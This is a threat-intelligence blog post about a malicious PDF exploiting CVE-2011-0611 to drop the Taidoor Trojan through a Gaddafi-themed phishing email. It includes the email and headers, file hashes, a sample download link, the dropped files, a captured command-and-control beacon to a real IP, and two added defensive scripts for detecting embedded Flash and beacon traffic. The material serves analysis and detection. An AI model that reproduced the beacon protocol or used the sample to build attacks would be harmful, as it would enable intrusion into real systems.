Contagio Exchange - Contagio community malware dump

Sunday, October 23, 2011

Oct 23 CVE-2011-0611 PDF 2011-10-23 Gaddafi death with Taidoor


I will post a few samples without analysis. This one is a CVE-2011-0611 PDF carrying the Taidoor Trojan, using Gaddafi's death as the lure, with an outgoing connection to 2.116.180.66 (host66-180-static.116-2-b.business.telecomitalia.it).
Common Vulnerabilities and Exposures (CVE) number

CVE-2011-0611 Adobe Flash Player before 10.2.154.27 on Windows, Mac OS X, Linux, and Solaris and 10.2.156.12 and earlier on Android; Adobe AIR before 2.6.19140; and Authplay.dll (aka AuthPlayLib.bundle) in Adobe Reader 9.x before 9.4.4 and 10.x through 10.0.1 on Windows, Adobe Reader 9.x before 9.4.4 and 10.x before 10.0.3 on Mac OS X, and Adobe Acrobat 9.x before 9.4.4 and 10.x before 10.0.3 on Windows and Mac OS X allow remote attackers to execute arbitrary code or cause a denial of service (application crash) via crafted Flash content; as demonstrated by a Microsoft Office document with an embedded .swf file that has a size inconsistency in a "group of included constants," object type confusion, ActionScript that adds custom functions to prototypes, and Date objects; and as exploited in the wild in April 2011.
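The vulnerability is reached through Flash content that Reader hands to authplay.dll, so a first triage step for a PDF like this one is to check whether the file carries a SWF at all. The script below is an added example, not code from the original post and not an analysis of ATT88422.pdf: it walks the PDF's stream objects, inflates FlateDecode streams, and reports any stream that begins with an SWF signature (FWS, CWS or ZWS) together with the dictionary tokens that declare Flash content. The two PDFs it scans are constructed inside the script as fixtures; the token list and the minimal PDF wrapper are assumptions made for illustration.

```python
import re
import zlib

# SWF signatures: FWS = uncompressed, CWS = zlib-compressed, ZWS = LZMA-compressed body.
SWF_MAGIC = (b"FWS", b"CWS", b"ZWS")
# Dictionary tokens that tell Reader to hand content to the Flash runtime (assumed list).
FLASH_KEYS = (b"/RichMedia", b"/Subtype /Flash", b"x-shockwave-flash")
# Stream bodies; the lookbehind keeps "endstream" from matching as a stream start.
STREAM_RE = re.compile(rb"(?<!end)stream\r?\n(.*?)\r?\nendstream", re.DOTALL)


def _inflate(raw):
    """Return the FlateDecode-inflated body, or the raw bytes if it is not zlib data."""
    try:
        return zlib.decompress(raw)
    except zlib.error:
        return raw


def scan_pdf_for_flash(pdf):
    """Return human-readable findings; an empty list means no Flash indicator was seen."""
    findings = []
    for key in FLASH_KEYS:
        if key in pdf:
            findings.append("dictionary token %s" % key.decode())
    for index, match in enumerate(STREAM_RE.finditer(pdf)):
        body = _inflate(match.group(1))
        # SWF header: 3-byte magic, 1-byte version, 4-byte little-endian uncompressed length.
        if len(body) >= 8 and body[:3] in SWF_MAGIC:
            findings.append(
                "stream %d starts with SWF magic %s (SWF version %d, declared length %d)"
                % (index, body[:3].decode(), body[3], int.from_bytes(body[4:8], "little"))
            )
    return findings


def _pdf_with_stream(dictionary, body):
    """Constructed minimal PDF wrapper: one object holding one stream (fixture, not a real file)."""
    return (
        b"%PDF-1.6\n1 0 obj\n<< /Length " + str(len(body)).encode() + b" " + dictionary
        + b" >>\nstream\n" + body + b"\nendstream\nendobj\n%%EOF\n"
    )


# Constructed fixture 1: a FlateDecode stream whose inflated content is a CWS header
# (SWF version 10, declared length 1234) followed by a zlib-compressed dummy body.
_FAKE_SWF = b"CWS" + bytes([10]) + (1234).to_bytes(4, "little") + zlib.compress(b"\x00" * 64)
SAMPLE_WITH_SWF = _pdf_with_stream(
    b"/Type /EmbeddedFile /Subtype /application#2Fx-shockwave-flash /Filter /FlateDecode",
    zlib.compress(_FAKE_SWF),
)

# Constructed fixture 2: an ordinary page-content stream, also FlateDecode.
SAMPLE_BENIGN = _pdf_with_stream(
    b"/Filter /FlateDecode",
    zlib.compress(b"BT /F1 12 Tf 72 720 Td (Hello) Tj ET"),
)

if __name__ == "__main__":
    for name, data in (("with_swf", SAMPLE_WITH_SWF), ("benign", SAMPLE_BENIGN)):
        print(name, scan_pdf_for_flash(data) or "no Flash indicators")
```

This only catches a SWF stored in a plain (or FlateDecode) stream; a sample that hides the Flash object inside an object stream (/ObjStm), behind a chained filter such as ASCIIHexDecode, or in a second-stage PDF such as the dropped 11.pdf needs those layers decoded first, so an empty result is not a clean bill of health.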

  General File Information

 File: ATT88422.pdf
Size: 249913
MD5:  1188EA8F0D086A8860A3AAFB54A3FA76

Download

Original Message


From: Mr.chl [mailto:Mr.chl@chumaps.chu.edu.tw]
Sent: Sunday, October 23, 2011 3:36 AM
To: xxxxxxxx
Subject: Fw:卡紮菲之死讓咱們更加百感交集

    卡紮菲被抓獲,卡紮菲受傷,卡紮菲死亡……20日,一條條從蘇爾特戰場傳出的消息,迅速傳到米蘇拉塔,傳到的黎波裏,傳到世界各地。有人歡呼,有人哀傷,更有人質疑消息的准確性……時隔數小時,利比亞“全國過渡委員會”執行委員會主席賈布裏勒在的黎波裏舉行新聞發布會,親口證實了統治利比亞42年之久的卡紮菲死亡的消息。早已躁動不安的的黎波裏頓時炸開了鍋。賈布裏勒說:“利比亞人民應該認識到,現在是塑造一個新利比亞的時候了,一個團結的.......

(English translation of the message above)

From: Mr.chl [mailto:Mr.chl@chumaps.chu.edu.tw]
Sent: Sunday, October 23, 2011 3:36 AM
To: xxxxxxxx
Subject: Fw: Gaddafi's death leaves us with even more mixed feelings

    Gaddafi captured, Gaddafi wounded, Gaddafi dead... On the 20th, one report after another from the Sirte battlefield spread quickly to Misrata, to Tripoli, and around the world. Some cheered, some grieved, and others questioned the accuracy of the news... Several hours later, Jibril, chairman of the executive committee of Libya's "National Transitional Council", held a press conference in Tripoli and personally confirmed the death of Gaddafi, who had ruled Libya for 42 years. Already restless, Tripoli boiled over at once. Jibril said: "The Libyan people should realize that now is the time to shape a new Libya, a united .......

Message Headers


Received: (qmail 2747 invoked from network); 23 Oct 2011 07:37:08 -0000
Received: from msr11.hinet.net (HELO msr11.hinet.net) (168.95.4.111)
  by xxxxxxxxxxxxxxx
Received: from deepin-f12c1fc0 (60-249-181-163.HINET-IP.hinet.net [60.249.181.163])
    by msr11.hinet.net (8.14.2/8.14.2) with SMTP id p9N7Zd5x021081
    for < xxxxxxxxxxx>; Sun, 23 Oct 2011 15:37:01 +0800 (CST)
Date: Sun, 23 Oct 2011 15:35:37 +0800
From: "Mr.chl" <Mr.chl@chumaps.chu.edu.tw>
To: "xxxxxxxxxxx
Reply-To: "mi.s8597" <mi.s8597@msa.hinet.net>
Subject: =?gb2312?B?Rnc6v6i8mbfG1q7LwNeM1NuCg7j8vNOw2bjQvbu8rw==?=
X-Priority: 3
X-GUID: DD855E25-0DA9-4004-88A5-7C652E9F02A9
X-Mailer: Foxmail 7.0.1.84[cn]
MIME-Version: 1.0
Message-ID: <201110231458564671317@chumaps.chu.edu.tw>
Content-Type: multipart/mixed;
    boundary="----=_001_NextPart622484256423_=----"

Sender

60.249.181.163 - Hinet address, Taiwan
CHTD, Chunghwa Telecom Co.,Ltd.
Data-Bldg.6F, No.21, Sec.21, Hsin-Yi Rd.
Taipei Taiwan 100



Automated Scans


VirusTotal is currently down, but it is CVE-2011-0611 with Taidoor.


Created files


\Temp\11.pdf
\Local Settings\VSS.exe
File: VSS.exe
Size: 22016
MD5:  6E57520AFE21C8E3E32B0BC097E765E5



Traffic


GET /uxvdd.php?id=0263801911380616G0 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: 2.116.180.66
Connection: Keep-Alive
Cache-Control: no-cache

HTTP/1.1 200 OK
Content-Length: 15
Content-Type: application/octet-stream
Connection: Close


2.116.180.66
host66-180-static.116-2-b.business.telecomitalia.it
Host reachable, 152 ms average
2.116.180.64 - 2.116.180.71
UNITESSILE S.P.A.
ROBERTO DORO
UNITESSILE S P A
VIA ROMA 15
33028 TOLMEZZO
Italy
phone: +394223277
fax: +39422327852
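The captured request has a shape a network analyst can key on: a five-letter .php resource, a single 18-character id parameter, a hard-coded MSIE 6.0 user-agent, a bare-IP Host header, and Cache-Control: no-cache on a GET. The script below is an added example, not code from the original post and not a published Taidoor signature: it parses raw request text, counts those traits, and flags a request when at least four co-occur (the threshold, the id-length rule taken from this single sample, and the trait list are assumptions made for illustration). The three requests it checks are constructed; the first is the request captured above, the other two are benign look-alikes that share one trait each.

```python
import ipaddress
import re
from urllib.parse import parse_qs, urlsplit

# Traits taken from the captured request on this page; none is rare on its own.
MSIE6_UA = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
PATH_RE = re.compile(r"^/[a-z]{5}\.php$")
ID_RE = re.compile(r"^[0-9A-Z]{18}$")  # assumed from the one id value seen here


def parse_request(raw):
    """Parse the head of a raw HTTP/1.x request into method, target and lower-cased headers."""
    lines = raw.strip().splitlines()
    method, target, _version = lines[0].split()
    headers = {}
    for line in lines[1:]:
        if not line.strip():
            break  # blank line ends the header block
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "target": target, "headers": headers}


def _is_bare_ip(host):
    """True when Host is an IPv4 literal (optional :port stripped) rather than a hostname."""
    try:
        ipaddress.ip_address(host.split(":")[0])
        return True
    except ValueError:
        return False


def beacon_indicators(req):
    """Return the list of Taidoor-like traits present in a parsed request."""
    hits = []
    url = urlsplit(req["target"])
    params = parse_qs(url.query)
    h = req["headers"]
    if req["method"] == "GET" and PATH_RE.match(url.path):
        hits.append("five-letter .php resource")
    if list(params) == ["id"] and len(params["id"]) == 1 and ID_RE.match(params["id"][0]):
        hits.append("single 18-character id parameter")
    if h.get("user-agent") == MSIE6_UA:
        hits.append("hard-coded MSIE 6.0 user-agent")
    if _is_bare_ip(h.get("host", "")):
        hits.append("Host header is a bare IP")
    if h.get("cache-control", "").lower() == "no-cache":
        hits.append("Cache-Control: no-cache on a GET")
    return hits


def is_suspicious(raw, threshold=4):
    """Flag a raw request when at least `threshold` traits co-occur (threshold is an assumption)."""
    return len(beacon_indicators(parse_request(raw))) >= threshold


# Constructed input 1: the request captured on this page.
CAPTURED_BEACON = """GET /uxvdd.php?id=0263801911380616G0 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: 2.116.180.66
Connection: Keep-Alive
Cache-Control: no-cache
"""

# Constructed input 2: an ordinary browser request; /index.php is also five letters, id is short.
BENIGN_BROWSER = """GET /index.php?id=42 HTTP/1.1
Host: www.example.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) Gecko/20100101 Firefox/91.0
Connection: keep-alive
"""

# Constructed input 3: an internal API call to a bare IP; one trait only.
BENIGN_INTERNAL = """GET /api/status HTTP/1.1
Host: 192.168.1.10:8080
User-Agent: python-requests/2.25.1
"""

if __name__ == "__main__":
    for label, raw in (("captured", CAPTURED_BEACON), ("browser", BENIGN_BROWSER), ("internal", BENIGN_INTERNAL)):
        print(label, is_suspicious(raw), beacon_indicators(parse_request(raw)))
```

The point of scoring rather than matching a single string is visible in the two benign inputs: a five-letter .php name and a bare-IP Host are each common on their own, and only the combination with the hard-coded user-agent and the fixed-width id is worth an alert. The 15-byte application/octet-stream reply is a further trait to log, but it is a response-side check and is left out here.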



